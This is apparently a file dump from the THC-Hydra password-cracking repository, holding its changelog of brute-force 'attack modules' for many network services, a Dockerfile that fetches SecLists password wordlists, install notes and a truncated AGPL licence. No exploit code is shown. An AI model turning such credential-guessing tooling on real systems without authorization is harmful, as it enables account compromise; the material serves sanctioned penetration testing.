SVN versions (thanks to David Maciejak @ GMAIL dot com)\n* Another patch by David to add the PLAIN auth mechanism to the smtp-auth module\n* mysql module now has two implementations and uses a library when found (again\n thanks to David Maciejak @ GMAIL dot com - what would hydra be without him)\n* camiloculpian @ gmail dot com submitted a logo for hydra - looks cool, thanks!\n* better FTP 530 error code detection\n* bugfix for the SVN module for non-standard ports (again david@)\n\n\nRelease 5.8\n* Added Apple Filing Protocol (thank to \"never tired\" David Maciejak @ GMAIL dot com)\n* Fixed a big bug in the SSL option (-S)\n\n\nRelease 5.7 \n* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)\n* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz\n* Removed unnecessary compiler warnings\n* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be\n* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??\n\n\nRelease 5.6 PRIVATE VERSION\n###########\n* Moved to GPLv3 License (lots of people wanted that)\n* Upgraded ssh2 module to libssh-0.4.x (thanks to aris (at) 0xbadc0de.be for\n the 0.2 basis)\n* Added firebird support (by David Maciejak @ GMAIL dot com)\n* Added SIP MD5 auth patch (by Jean-Baptiste Aviat 100\n! Soon to come: v5.0 - some cool new features to arrive on your pentest\n machine!\n\n\nRelease 4.6\n###########\n* Snakebyte delivered a module for Teamspeak\n* Snakebyte updated the rexec module for the Hydra Palm version\n* Snakebyte updated xhydra to support the new Telnet success response option\n* Clarified the Licence\n* Updated the ldap module to support v3, note that \"ldap\" is now specified as\n \"ldap2\" or \"ldap3\". Added wrong version detection.\n\n\nRelease 4.5\n###########\n* The configure script now detects Cygwin automatically :-)\n* The telnet module now handles the OPT special input. Specify the string\n which is displayed after successfully a login. Use this if you have false\n positives.\n* Made smtp-auth module more flexible in EHLO/HELO handling\n* Fixed some glitches in the SAP/R3 module (correct sysnr, better port\n handling) thanks to ngregoire@exaprobe.com !\n* Fixed some glitches in the http/https module\n* Fixed a big bug in snakebyte's snmp module \n* Warning msg is now displayed if the deprecated icq module is used\n* Added warning message to the ssh2 module during compilation as many people\n use the newest libssh version which is broken.\n\n\nRelease 4.4\n###########\n* Fixed another floating point exception *sigh*\n* Fixed -C colon mode\n* Added EHLO support for the smtp-auth module, required for some smtpd\n\n\nRelease 4.3\n###########\n* Fixed a divide by zero bug in the status report function\n* Added functionality for skipping accounts (cvs is so nice to report this)\n* Snakebyte sent in a patch for cvs for skipping nonexisting accounts\n* sent in a patch to fix proxy support for the HTTP module\n without proxy authentication\n\n\nRelease 4.2\n###########\n* Snakebyte sent in modules for SNMP and CVS - great work!\n* Snakebyte also expanded the gtk gui to support the two new modules\n* Justin sent in a module for smtp-auth ... thanks!\n* master_up@post.cz sent in some few patches to fix small glitches\n* Incorporated a check from the openbsd port\n\n\nRelease 4.1\n###########\n* Snakebyte wrote a very nice GTK GUI for hydra! enjoy!\n* due a bug, sometimes hydra would kill process -1 ... baaaad boy!\n* found passwords are now also printed to stdout if -o option is used\n* reported that hydra wouldn't complain on ssh2 option if\n compiled without support, fixed\n* made an official port for FreeBSD and sent me a\n diff to exchange the MD4 of libdes to openssl\n* noticed that hydra will crash on big wordlists as\n the result of the mallocs there were not checked, fixed\n* Snakebyte expanded his PalmOS Version of hydra to nntp and fixed vnc\n* Increased the wait time for children from 5 to 15 seconds, as e.g.\n snakebyte reported detection problems\n* Fixed some display glitches\n\n\nRelease v4.0\n############\n#\n# This is a summary of changes of the D1 to D5 beta releases and shows\n# what makes v4.0 different from 3.1.\n# Have fun. Lots of it.\n#\n# By the way: I need someone to program a nice GTK frontend for hydra,\n# would YOU like to do that and receive the fame? Send an email to vh@thc.org !\n#\n* For the first time there is not only a UNIX/source release but additionally:\n ! Windows release (cygwin compile with dll's)\n ! PalmPilot release\n ! ARM processor release (for all your Zaurus, iPaq etc. running Linux)\n* There are new service attack modules:\n ! ms-sql\n ! sap r/3 (requires a library)\n ! ssh v2 (requires a library)\n* Enhancements/Fixes to service attack modules:\n ! vnc module didnt work correctly, fixed\n ! mysql module supports newer versions now\n ! http module received a minor fix and has better virtual host support now\n ! http-proxy supports now an optional URL\n ! socks5 checks now for false positives and daemons without authentication\n* The core code (hydra.c) was rewritten from scratch\n ! rewrote the internal distribution functions from scratch. code is now\n safer, less error prone, easier to read.\n ! multiple target support rewritten which now includes intelligent load\n balancing based on success, error and load rate\n ! intelligently detect maximum connect numbers for services (per server if\n multiple targets are used)\n ! intelligent restore file writing\n ! Faster (up to 15%)\n ! Full Cygwin and Cygwin IPv6 support\n* added new tool: pw-inspector - it can be used to just try passwords which\n matches the target's password policy\n#\n# This should be more than enough! :-)\n#\n\n... the rest below is history ...\n\n###########################################################################\n#\n# New Hydra v4.0 code branch\n#\nRelease D5\n* added patches by kan@dcit.cz which enhance the proxy module and provide\n a small fix for the http module\n* small beautifcations to make the compiler happy\n! This is the final beta version before public release\n - please test everything!\n\nRelease D4\n* Tick made an update to his configure-arm\n* snakebyte@gmx.de added imap, vnc and cisco module support to PalmPilot\n* fixed VNC module\n* enhanced mysql module to work also with 4.0.x (and all future protocol 10\n mysql protocol types)\n* enhanced socks5 module to identify daemons which do not require\n authentication, and false positive check (otherwise dante would report all\n tries as successful)\n* fixed a bug in configure for D3 which resulted in compile problems on\n several platforms requiring libcrypto\n\nRelease D3\n* added sapr3 attack module (requires libsdk.a and saprfc.h)\n* added ssh2 attack module (requires libssh)\n* snakebyte@gmx.de added telnet module support for PalmPilot\n* fixed the mssql module, should work now\n* fixed -e option bug\n* fixed -C option bug (didnt work at all!!)\n* fixed double detection (with -e option) plus added simple dictionary\n double detection\n* target port is now displayed on start\n\nRelease D2\n* added better virtual host support to the www/http/https/ssl module\n (based on a patch from alla@scanit.be)\n* added ARM support (does not work for libdes yet, ssl works), done by\n Tick \n* added Palm support (well, in reality it is more a rewrite which can use\n the hydra-modules), done by snakebyte \n* added ms-sql attack module (code based on perl script form HD Moore\n , thanks for contributing)\n\nRelease D1 (3 March 2003)\n* rewrote the internal distribution functions from scratch. code is now\n safer, less error prone, easier to read.\n* multiple target support rewritten which now includes intelligent load\n balancing based on success, error and load rate\n* intelligently detect maximum connect numbers for services (per server if\n multiple targets are used)\n* intelligent restore file writing\n* Faster (up to 15%)\n* Full Cygwin and Cygwin IPv6 support\n* added new tool: pw-inspector - it can be used to just try passwords which\n matches the target's password policy\n\n###########################################################################\n\nv3.0 (FEBRUARY 2004)\t\tPUBLIC RELEASE\n* added a restore function to enable you to continue aborted/crashed\n sessions. Just type \"hydra -R\" to continue a session.\n NOTE: this does not work with the -M option! This feature is then disabled!\n* added a module for http proxy authentication cracking (\"http-proxy\") :-)\n* added HTTP and SSL/CONNECT proxy support. SSL/CONNECT proxy support works\n for *all* TCP protocols, you just need to find a proxy which allows you to\n CONNECT on port 23 ...\n The environment variable HYDRA_PROXY_HTTP defines the web proxy. The\n following syntax is valid: HYDRA_PROXY_HTTP=\"http://123.45.67.89:8080/\"\n Same for HYDRA_PROXY_CONNECT.\n If you require authentication for the proxy, use the HYDRA_PROXY_AUTH\n environment variable:\n HYDRA_PROXY_AUTH=\"login:password\"\n* fixed parallel host scanning engine (thanks to m0j0.j0j0 for reporting)\n* A status, speed and time to completion report is now printed every minute.\n* finally updated the README\n\nv2.9 (FEBRUARY 2004)\t\tPRIVATE RELEASE\n...\n\nv2.8 (JANUARY 2004)\t\tPRIVATE RELEASE\n...\n\nv2.7 (JANUARY 2004)\t\tPUBLIC RELEASE\n* small fix for the parallel host code (thanks to m0j0@foofus.net)\n\nv2.6 (DECEMBER 2003)\t\tPUBLIC RELEASE\n* fixed a compiling problem for picky compilers.\n\nv2.5 (NOVEMBER 2003)\t\tPUBLIC RELEASE\n* added a big patch from m0j0@foofus.net which adds:\n - AAA authentication to the cisco-enable module\n - Running the attacks on hosts in parallel\n - new smbnt module, which uses lanman hashes for authentication, needs libdes\n ! great work and thanks !\n* changed code to compile easily on FreeBSD\n* changed configure to compile easily on MacOS X - Panther (cool OS btw ...)\n\nv2.4 (AUGUST 2003)\t\tPUBLIC RELEASE\n* public release\n=== 2.3 stuff===\n* added mysql module (thanks to mcbethh@u-n-f.com)\n* small fix in vnc (thanks to the Nessus team)\n* added credits for vnc-module (FX/Phenolite)\n* new ./configure script for better Solaris and *BSD support (copied from amap)\n* updated to new email/www addresses => www.thc.org\n\nv2.2 (OCTOBER 2002)\t\tPUBLIC RELEASE\n* fixed a bug in the -P passwordfile handling ... uhhh ... thanks to all\n the many people who reported that bug!\n* added check if a password in -P passwordfile was already done via the\n -e n|s switch\n\nv2.1 (APRIL 2002)\t\tPUBLIC RELEASE\n* added ldap cracking mode (thanks to myself, eh ;-)\n* added -e option to try null passwords (\"-e n\") and passwords equal to the\n login (\"-e s\"). When specifying -e, -p/-P is optional (and vice versa)\n* when a login is found, hydra will now go on with the next login\n\nv2.0 (APRIL 2002)\t\tPRIVATE RELEASE\n! with v1.1.14 of Nessus, Hydra is a Nessus plugin!\n* incorporated code to make hydra a nessus plugin (thanks to deraison@cvs.nessus.org !)\n* added smb/samba/CIFS cracking mode (thanks to deraison@cvs.nessus.org !)\n* added cisco-enable cracking mode (thanks to J.Marx@secunet.de !)\n* minor enhancements and fixes\n\nv1.7 (MARCH 2002)\t\tPRIVATE RELEASE\n* configure change to better detect OpenSSL\n* ported to Solaris\n\nv1.6 (FEBRUARY 2002)\t\tPUBLIC RELEASE\n* added socks5 support (thanks to bigbud@weed.tc !)\n\nv1.5 (DECEMBER 2001)\t\tPRIVATE RELEASE\n* added -S option for SSL support (for all TCP based protocols)\n* added -f option to stop attacking once a valid login/pw has been discovered\n* made modules more hydra-mod compliant\n* configure stuff thrown out - was not really used and too complicated,\n wrote my own, lets hope it works everywhere ;-)\n\nv1.4 (DECEMBER 2001)\t\tPUBLIC RELEASE\n* added REXEC cracking module\n* added NNTP cracking module\n* added VNC cracking module (plus the 3DES library, which is needed) - some\n of the code ripped from FX/Phenolite :-) thanks a lot\n* added PCNFS cracking module\n* added ICQ cracking module (thanks to ocsic !!)\n* for the pcnfs cracking module, I had to add the hydra_connect_udp function\n* added several compactibility stuff to work with all the M$ crap\n\nv1.3 (September 2001)\t\tPUBLIC RELEASE\n* uh W2K telnetd sends null bytes in negotiation mode. workaround implemented.\n* Rewrote the finish functions which would sometimes hang. Shutdowns are faster\n now as well.\n* Fixed the line count (it was always one to much)\n* Put more information in the outpufile (-o)\n* Removed some configure crap.\n\nv1.2 (August 2001)\t\tPRIVATE RELEASE\n* Fixed a BIG bug which resulted in accounts being checked serveral times. ugh\n* Fixed the bug which showed the wrong password for a telnet hack. Works for\n me. please test.\n* Added http basic authentication cracking. Works for me. please test.\n* Fixed the ftp cracker module for occasions where a long welcome message was\n displayed for ftp.\n* Removed some compiler warnings.\n\nv1.1 (May 2001)\t\t\tPUBLIC RELEASE\n* Added wait+reconnect functionality to hydra-mod\n* Additional wait+reconnect for cisco module\n* Added small waittimes to all attack modules to prevent too fast reconnects\n* Added cisco Username/Password support to the telnet module\n* Fixed a deadlock in the modules, plus an additional one in the telnet module\n\nv1.0 (April 2001)\t\tPUBLIC RELEASE\n* Verified that all service modules really work, no fix necessary ;-)\n ... so let's make it public\n* Changed the LICENCE\n\nv0.6 (April 2001)\t\tPRIVATE RELEASE\n* Added hydra-cisco.c for the cisco 3 times \"Password:\" type\n* Added hydra-imap.c for the imap service\n* Fixed a bug in hydra-mod.c: empty logins resulted in an empty\n hydra_get_next_password() :-(, additionally the blocking/recv works better\n now. (no, not better - perfect ;-)\n* Fixed a bug in hydra-telnet.c: too many false alarms for success due some\n mis-thinking on my side and I also implemented a more flexible checking\n* Fixed hydra-ftp.c to allow more weird reactions\n* Fixed all ;-) memory leaks\n\nv0.5 (December 2000)\t\tPUBLIC RELEASE\n* NOTE WE HAVE GOT A NEW WWW ADDRESS -> www.thehackerschoice.com\n* added telnet protocol\n* exchanged snprintf with sprintf(%.250s) to let it compile on more platforms\n but still have buffer overflow protection.\n* fixed a bug in Makefile.in (introduced by Plasmo ,-)\n\nv0.4 (August 2000)\t\tPUBLIC RELEASE\n* Plasmoid added a ./configure script. thanks!\n\nv0.3 (August 2000)\n* first release\n" }, { "path": "CITATION.cff", "content": "cff-version: 1.2.0\nmessage: \"If you use this software, please cite it as below.\"\nauthors:\n - given-names: Marc\n family-names: Heuse\n name-particle: \"van Hauser\"\n email: vh@thc.org\n affiliation: The Hacker's Choice\ntitle: \"hydra\"\nversion: 9.2\ntype: software\ndate-released: 2021-03-15\nurl: \"https://github.com/vanhauser-thc/thc-hydra\"\nkeywords:\n - scanning\n - passwords\n - hacking\n - pentesting\n - securiy\nlicense: AGPL-3.0-or-later\n" }, { "path": "Dockerfile", "content": "FROM debian:bookworm-slim\n\nARG HYDRA_VERSION=\"github\"\n\nLABEL \\\n org.opencontainers.image.url=\"https://github.com/vanhauser-thc/thc-hydra\" \\\n org.opencontainers.image.source=\"https://github.com/vanhauser-thc/thc-hydra\" \\\n org.opencontainers.image.version=\"$HYDRA_VERSION\" \\\n org.opencontainers.image.vendor=\"vanhauser-thc\" \\\n org.opencontainers.image.title=\"hydra\" \\\n org.opencontainers.image.licenses=\"GNU AFFERO GENERAL PUBLIC LICENSE\"\n\nCOPY . /src\n\nRUN set -x \\\n && apt-get update \\\n && apt-get -y install \\\n #libmysqlclient-dev \\\n default-libmysqlclient-dev \\\n libgpg-error-dev \\\n #libmemcached-dev \\\n #libgcrypt11-dev \\\n libgcrypt-dev \\\n #libgcrypt20-dev \\\n #libgtk-3-dev \\\n libpcre3-dev \\\n #firebird-dev \\\n libidn11-dev \\\n libssh-dev \\\n #libsvn-dev \\\n libssl-dev \\\n #libpq-dev \\\n make \\\n curl \\\n gcc \\\n 1>/dev/null \\\n # The next line fixes the curl \"SSL certificate problem: unable to get local issuer certificate\" for linux/arm\n && c_rehash\n\n# Get hydra sources and compile\nRUN cd /src \\\n && make clean \\\n && ./configure \\\n && make \\\n && make install\n\n# Make clean\nRUN apt-get purge -y make gcc \\\n && apt-get autoremove -y \\\n && rm -rf /var/lib/apt/lists/* \\\n && rm -rf /src\n\n# Verify hydra installation\nRUN hydra -h || error_code=$? \\\n && if [ ! \"${error_code}\" -eq 255 ]; then echo \"Wrong exit code for 'hydra help' command\"; exit 1; fi \\\n # Unprivileged user creation\n && echo 'hydra:x:10001:10001::/tmp:/sbin/nologin' > /etc/passwd \\\n && echo 'hydra:x:10001:' > /etc/group\n\nARG INCLUDE_SECLISTS=\"true\"\n\nRUN set -x \\\n && if [ \"${INCLUDE_SECLISTS}\" = \"true\" ]; then \\\n mkdir /tmp/seclists \\\n && curl -SL \"https://api.github.com/repos/danielmiessler/SecLists/tarball\" -o /tmp/seclists/src.tar.gz \\\n && tar xzf /tmp/seclists/src.tar.gz -C /tmp/seclists \\\n && mv /tmp/seclists/*SecLists*/Passwords /opt/passwords \\\n && mv /tmp/seclists/*SecLists*/Usernames /opt/usernames \\\n && chmod -R u+r /opt/passwords /opt/usernames \\\n && rm -Rf /tmp/seclists \\\n && ls -la /opt/passwords /opt/usernames \\\n ;fi\n\n# Use an unprivileged user\nUSER 10001:10001\n\nENTRYPOINT [\"hydra\"]\n" }, { "path": "INSTALL", "content": "type \"./configure\", then \"make\" and finally \"sudo make install\"\n\nFor special modules you need to install software packages before\nyou run \"./configure\":\n Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncurses5-dev\n Redhat/Fedora: yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel\n OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel\n\nFor xhydra (GTK GUI) you need to install autoconf and the GTK3 development files:\n Ubuntu/Debian: apt-get install autoconf libgtk-3-dev\n Redhat/Fedora: yum install autoconf gtk3-devel\n OpenSuSE: zypper install autoconf gtk3-devel\n\nFor Termux/Android you need the following setup:\n\nInstall the necessary dependencies\n # pkg install -y x11-repo\n # pkg install -y clang make openssl openssl-tool wget openssh coreutils gtk3\nAnd then compiling hydra\n # ./configure --prefix=$PREFIX\n # make\n # make install\n\n\nTo use xhydra, you will need to install a graphical output in termux, you can be guided from this article:\n\nhttps://wiki.termux.com/wiki/Graphical_Environment\n\n\nFor the Oracle login module, install the basic and SDK packages:\n https://www.oracle.com/database/technologies/instant-client/downloads.html\n\n" }, { "path": "LICENSE", "content": " GNU AFFERO GENERAL PUBLIC LICENSE\n Version 3, 19 November 2007\n\n Copyright (C) 2007 Free Software Foundation, Inc. \n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n Preamble\n\n The GNU Affero General Public License is a free, copyleft license for\nsoftware and other kinds of works, specifically designed to ensure\ncooperation with the community in the case of network server software.\n\n The licenses for most software and other practical works are designed\nto take away your freedom to share and change the works. By contrast,\nour General Public Licenses are intended to guarantee your freedom to\nshare and change all versions of a program--to make sure it remains free\nsoftware for all its users.\n\n When we speak of free software, we are referring to freedom, not\nprice. Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthem if you wish), that you receive source code or can get it if you\nwant it, that you can change the software or use pieces of it in new\nfree programs, and that you know you can do these things.\n\n Developers that use our General Public Licenses protect your rights\nwith two steps: (1) assert copyright on the software, and (2) offer\nyou this License which gives you legal permission to copy, distribute\nand/or modify the software.\n\n A secondary benefit of defending all users' freedom is that\nimprovements made in alternate versions of the program, if they\nreceive widespread use, become available for other developers to\nincorporate. Many developers of free software are heartened and\nencouraged by the resulting cooperation. However, in the case of\nsoftware used on network servers, this result may fail to come about.\nThe GNU General Public License permits making a modified version and\nletting the public access it on a server without ever releasing its\nsource code to the public.\n\n The GNU Affero General Public License is designed specifically to\nensure that, in such cases, the modified source code becomes available\nto the community. It requires the operator of a network server to\nprovide the source code of the modified version running there to the\nusers of that server. Therefore, public use of a modified version, on\na publicly accessible server, gives the public access to the source\ncode of the modified version.\n\n An older license, called the Affero General Public License and\npublished by Affero, was designed to accomplish similar goals. This is\na different license, not a version of the Affero GPL, but Affero has\nreleased a new version of the Affero GPL which permits relicensing under\nthis license.\n\n The precise terms and conditions for copying, distribution and\nmodification follow.\n\n TERMS AND CONDITIONS\n\n 0. Definitions.\n\n \"This License\" refers to version 3 of the GNU Affero General Public License.\n\n \"Copyright\" also means copyright-like laws that apply to other kinds of\nworks, such as semiconductor masks.\n\n \"The Program\" refers to any copyrightable work licensed under this\nLicense. Each licensee is addressed as \"you\". \"Licensees\" and\n\"recipients\" may be individuals or organizations.\n\n To \"modify\" a work means to copy from or adapt all or part of the work\nin a fashion requiring copyright permission, other than the making of an\nexact copy. The resulting work is called a \"modified version\" of the\nearlier work or a work \"based on\" the earlier work.\n\n A \"covered work\" means either the unmodified Program or a work based\non the Program.\n\n To \"propagate\" a work means to do anything with it that, without\npermission, would make you directly or secondarily liable for\ninfringement under applicable copyright law, except executing it on a\ncomputer or modifying a private copy. Propagation includes copying,\ndistribution (with or without modification), making available to the\npublic, and in some countries other activities as well.\n\n To \"convey\" a work means any kind of propagation that enables other\nparties to make or receive copies. Mere interaction with a user through\na computer network, with no transfer of a copy, is not conveying.\n\n An interactive user interface displays \"Appropriate Legal Notices\"\nto the extent that it includes a convenient and prominently visible\nfeature that (1) displays an appropriate copyright notice, and (2)\ntells the user that there is no warranty for the work (except to the\nextent that warranties are provided), that licensees may convey the\nwork under this License, and how to view a copy of this License. If\nthe interface presents a list of user commands or options, such as a\nmenu, a prominent item in the list meets this criterion.\n\n 1. Source Code.\n\n The \"source code\" for a work means the preferred form of the work\nfor making modifications to it. \"Object code\" means any non-source\nform of a work.\n\n A \"Standard Interface\" means an interface that either is an official\nstandard defined by a recognized standards body, or, in the case of\ninterfaces specified for a particular programming language, one that\nis widely used among developers working in that language.\n\n The \"System Libraries\" of an executable work include anything, other\nthan the work as a whole, that (a) is included in the normal form of\npackaging a Major Component, but which is not part of that Major\nComponent, and (b) serves only to enable use of the work with that\nMajor Component, or to implement a Standard Interface for which an\nimplementation is available to the public in source code form. A\n\"Major Component\", in this context, means a major essential component\n(kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to\nproduce the work, or an object code interpreter used to run it.\n\n The \"Corresponding Source\" for a work in object code form means all\nthe source code needed to generate, install, and (for an executable\nwork) run the object code and to modify the work, including scripts to\ncontrol those activities. However, it does not include the work's\nSystem Libraries, or general-purpose tools or generally available free\nprograms which are used unmodified in performing those activities but\nwhich are not part of the work. For example, Corresponding Source\nincludes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically\nlinked subprograms that the work is specifically designed to require,\nsuch as by intimate data communication or control flow between those\nsubprograms and other parts of the work.\n\n The Corresponding Source need not include anything that users\ncan regenerate automatically from other parts of the Corresponding\nSource.\n\n The Corresponding Source for a work in source code form is that\nsame work.\n\n 2. Basic Permissions.\n\n All rights granted under this License are granted for the term of\ncopyright on the Program, and are irrevocable provided the stated\nconditions are met. This License explicitly affirms your unlimited\npermission to run the unmodified Program. The output from running a\ncovered work is covered by this License only if the output, given its\ncontent, constitutes a covered work. This License acknowledges your\nrights of fair use or other equivalent, as provided by copyright law.\n\n You may make, run and propagate covered works that you do not\nconvey, without conditions so long as your license otherwise remains\nin force. You may convey covered works to others for the sole purpose\nof having them make modifications exclusively for you, or provide you\nwith facilities for running those works, provided that you comply with\nthe terms of this License in conveying all material for which you do\nnot control copyright. Those thus making or running the covered works\nfor you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of\nyour copyrighted material outside their relationship with you.\n\n Conveying under any other circumstances is permitted solely under\nthe conditions stated below. Sublicensing is not allowed; section 10\nmakes it unnecessary.\n\n 3. Protecting Users' Legal Rights From Anti-Circumvention Law.\n\n No covered work shall be deemed part of an effective technological\nmeasure under any applicable law fulfilling obligations under article\n11 of the WIPO copyright treaty adopted on 20 December 1996, or\nsimilar laws prohibiting or restricting circumvention of such\nmeasures.\n\n When you convey a covered work, you waive any legal power to forbid\ncircumvention of technological measures to the extent such circumvention\nis effected by exercising rights under this License with respect to\nthe covered work, and you disclaim any intention to limit operation or\nmodification of the work as a means of enforcing, against the work's\nusers, your or third parties' legal rights to forbid circumvention of\ntechnological measures.\n\n 4. Conveying Verbatim Copies.\n\n You may convey verbatim copies of the Program's source code as you\nreceive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice;\nkeep intact all notices stating that this License and any\nnon-permissive terms added in accord with section 7 apply to the code;\nkeep intact all notices of the absence of any warranty; and give all\nrecipients a copy of this License along with the Program.\n\n You may charge any price or no price for each copy that you convey,\nand you may offer support or warranty protection for a fee.\n\n 5. Conveying Modified Source Versions.\n\n You may convey a work based on the Program, or the modifications to\nproduce it from the Program, in the form of source code under the\nterms of section 4, provided that you also meet all of these conditions:\n\n a) The work must carry prominent notices stating that you modified\n it, and giving a relevant date.\n\n b) The work must carry prominent notices stating that it is\n released under this License and any conditions added under section\n 7. This requirement modifies the requirement in section 4 to\n \"keep intact all notices\".\n\n c) You must license the entire work, as a whole, under this\n License to anyone who comes into possession of a copy. This\n License will therefore apply, along with any applicable section 7\n additional terms, to the whole of the work, and all its parts,\n regardless of how they are packaged. This License gives no\n permission to license the work in any other way, but it does not\n invalidate such permission if you have separately received it.\n\n d) If the work has interactive user interfaces, each must display\n Appropriate Legal Notices; however, if the Program has interactive\n interfaces that do not display Appropriate Legal Notices, your\n work need not make them do so.\n\n A compilation of a covered work with other separate and independent\nworks, which are not by their nature extensions of the covered work,\nand which are not combined with it such as to form a larger program,\nin or on a volume of a storage or distribution medium, is called an\n\"aggregate\" if the compilation and its resulting copyright are not\nused to limit the access or legal rights of the compilation's users\nbeyond what the individual works permit. Inclusion of a covered work\nin an aggregate does not cause this License to apply to the other\nparts of the aggregate.\n\n 6. Conveying Non-Source Forms.\n\n You may convey a covered work in object code form under the terms\nof sections 4 and 5, provided that you also convey the\nmachine-readable Corresponding Source under the terms of this License,\nin one of these ways:\n\n a) Convey the object code in, or embodied in, a physical product\n (including a physical distribution medium), accompanied by the\n Corresponding Source fixed on a durable physical medium\n customarily used for software interchange.\n\n b) Convey the object code in, or embodied in, a physical product\n (including a physical distribution medium), accompanied by a\n written offer, valid for at least three years and valid for as\n long as you offer spare parts or customer support for that product\n model, to give anyone who possesses the object code either (1) a\n copy of the Corresponding Source for all the software in the\n product that is covered by this License, on a durable physical\n medium customarily used for software interchange, for a price no\n more than your reasonable cost of physically performing this\n conveying of source, or (2) access to copy the\n Corresponding Source from a network server at no charge.\n\n c) Convey individual copies of the object code with a copy of the\n written offer to provide the Corresponding Source. This\n alternative is allowed only occasionally and noncommercially, and\n only if you received the object code with such an offer, in accord\n with subsection 6b.\n\n d) Convey the object code by offering access from a designated\n place (gratis or for a charge), and offer equivalent access to the\n Corresponding Source in the same way through the same place at no\n further charge. You need not require recipients to copy the\n Corresponding Source along with the object code. If the place to\n copy the object code is a network server, the Corresponding Source\n may be on a different server (operated by you or a third party)\n that supports equivalent copying facilities, provided you maintain\n clear directions next to the object code saying where to find the\n Corresponding Source. Regardless of what server hosts the\n Corresponding Source, you remain obligated to ensure that it is\n available for as long as needed to satisfy these requirements.\n\n e) Convey the object code using peer-to-peer transmission, provided\n you inform other peers where the object code and Corresponding\n Source of the work are being offered to the general public at no\n charge under subsection 6d.\n\n A separable portion of the object code, whose source code is excluded\nfrom the Corresponding Source as a System Library, need not be\nincluded in conveying the object code work.\n\n A \"User Product\" is either (1) a \"consumer product\", which means any\ntangible personal property which is normally used for personal, family,\nor household purposes, or (2) anything designed or sold for incorporation\ninto a dwelling. In determining whether a product is a consumer product,\ndoubtful cases shall be resolved in favor of coverage. For a particular\nproduct received by a particular user, \"normally used\" refers to a\ntypical or common use of that class of product, regardless of the status\nof the particular user or of the way in which the particular user\nactually uses, or expects or is expected to use, the product. A product\nis a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent\nthe only significant mode of use of the product.\n\n \"Installation Information\" for a User Product means any methods,\nprocedures, authorization keys, or other information required to install\nand execute modified versions of a covered work in that User Product from\na modified version of its Corresponding Source. The information must\nsuffice to ensure that the continued functioning of the modified object\ncode is in no case prevented or interfered with solely because\nmodification has been made.\n\n If you convey an object code work under this section in, or with, or\nspecifically for use in, a User Product, and the conveying occurs as\npart of a transaction in which the right of possession and use of the\nUser Product is transferred to the recipient in perpetuity or for a\nfixed term (regardless of how the transaction is characterized), the\nCorresponding Source conveyed under this section must be accompanied\nby the Installation Information. But this requirement does not apply\nif neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has\nbeen installed in ROM).\n\n The requirement to provide Installation Information does not include a\nrequirement to continue to provide support service, warranty, or updates\nfor a work that has been modified or installed by the recipient, or for\nthe User Product in which it has been modified or installed. Access to a\nnetwork may be denied when the modification itself materially and\nadversely affects the operation of the network or violates the rules and\nprotocols for communication across the network.\n\n Corresponding Source conveyed, and Installation Information provided,\nin accord with this section must be in a format that is publicly\ndocumented (and with an implementation available to the public in\nsource code form), and must require no special password or key for\nunpacking, reading or copying.\n\n 7. Additional Terms.\n\n \"Additional permissions\" are terms that supplement the terms of this\nLicense by making exceptions from one or more of its conditions.\nAdditional permissions that are applicable to the entire Program shall\nbe treated as though they were included in this License, to the extent\nthat they are valid under applicable law. If additional permissions\napply only to part of the Program, that part may be used separately\nunder those permissions, but the entire Program remains governed by\nthis License without regard to the additional permissions.\n\n When you convey a copy of a covered work, you may at your option\nremove any additional permissions from that copy, or from any part of\nit. (Additional permissions may be written to require their own\nremoval in certain cases when you modify the work.) You may place\nadditional permissions on material, added by you to a covered work,\nfor which you have or can give appropriate copyright permission.\n\n Notwithstanding any other provision of this License, for material you\nadd to a covered work, you may (if authorized by the copyright holders of\nthat material) supplement the terms of this License with terms:\n\n a) Disclaiming warranty or limiting liability differently from the\n terms of sections 15 and 16 of this License; or\n\n b) Requiring preservation of specified reasonable legal notices or\n author attributions in that material or in the Appropriate Legal\n Notices displayed by works containing it; or\n\n c) Prohibiting misrepresentation of the origin of that material, or\n requiring that modified versions of such material be marked in\n reasonable ways as different from the original version; or\n\n d) Limiting the use for publicity purposes of names of licensors or\n authors of the material; or\n\n e) Declining to grant rights under trademark law for use of some\n trade names, trademarks, or service marks; or\n\n f) Requiring indemnification of licensors and authors of that\n material by anyone who conveys the material (or modified versions of\n it) with contractual assumptions of liability to the recipient, for\n any liability that these contractual assumptions directly impose on\n those licensors and authors.\n\n All other non-permissive additional terms are considered \"further\nrestrictions\" within the meaning of section 10. If the Program as you\nreceived it, or any part of it, contains a notice stating that it is\ngoverned by this License along with a term that is a further\nrestriction, you may remove that term. If a license document contains\na further restriction but permits relicensing or conveying under this\nLicense, you may add to a covered work material governed by the terms\nof that license document, provided that the further restriction does\nnot survive such relicensing or conveying.\n\n If you add terms to a covered work in accord with this section, you\nmust place, in the relevant source files, a statement of the\nadditional terms that apply to those files, or a notice indicating\nwhere to find the applicable terms.\n\n Additional terms, permissive or non-permissive, may be stated in the\nform of a separately written license, or stated as exceptions;\nthe above requirements apply either way.\n\n 8. Termination.\n\n You may not propagate or modify a covered work except as expressly\nprovided under this License. Any attempt otherwise to propagate or\nmodify it is void, and will automatically terminate your rights under\nthis License (including any patent licenses granted under the third\nparagraph of section 11).\n\n However, if you cease all violation of this License, then your\nlicense from a particular copyright holder is reinstated (a)\nprovisionally, unless and until the copyright holder explicitly and\nfinally terminates your license, and (b) permanently, if the copyright\nholder fails to notify you of the violation by some reasonable means\nprior to 60 days after the cessation.\n\n Moreover, your license from a particular copyright holder is\nreinstated permanently if the copyright holder notifies you of the\nviolation by some 